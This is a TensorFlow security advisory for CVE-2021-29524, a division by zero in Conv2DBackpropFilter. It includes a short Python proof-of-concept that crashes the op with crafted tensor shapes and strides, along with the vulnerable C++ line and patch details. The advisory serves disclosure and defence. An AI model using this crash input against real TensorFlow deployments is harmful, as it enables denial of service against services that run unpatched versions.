1## TFSA-2021-013: Division by 0 in `Conv2DBackpropFilter` 2 3### CVE Number 4CVE-2021-29524 5 6### Impact 7An attacker can trigger a division by 0 in `tf.raw_ops.Conv2DBackpropFilter`: 8 9```python 10import tensorflow as tf 11 12input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) 13filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) 14out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) 15 16tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, 17 out_backprop=out_backprop, 18 strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, 19 padding='SAME', explicit_paddings=[], 20 data_format='NHWC', dilations=[1, 1, 1, 1]) 21``` 22 23This is because the 24[implementation](https://github.com/tensorflow/tensorflow/blob/496c2630e51c1a478f095b084329acedb253db6b/tensorflow/core/kernels/conv_grad_shape_utils.cc#L130) does a modulus operation where the divisor is controlled by the caller: 25 26```cc 27 if (dims->in_depth % filter_shape.dim_size(num_dims - 2)) { ... } 28``` 29 30### Patches 31We have patched the issue in GitHub commit 32[fca9874a9b42a2134f907d2fb46ab774a831404a](https://github.com/tensorflow/tensorflow/commit/fca9874a9b42a2134f907d2fb46ab774a831404a). 33 34The fix will be included in TensorFlow 2.5.0. We will also cherrypick this 35commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 362.1.4, as these are also affected and still in supported range. 37 38### For more information 39Please consult [our security 40guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for 41more information regarding the security model and how to contact us with issues 42and questions. 43 44### Attribution 45This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu 46X-Team. 47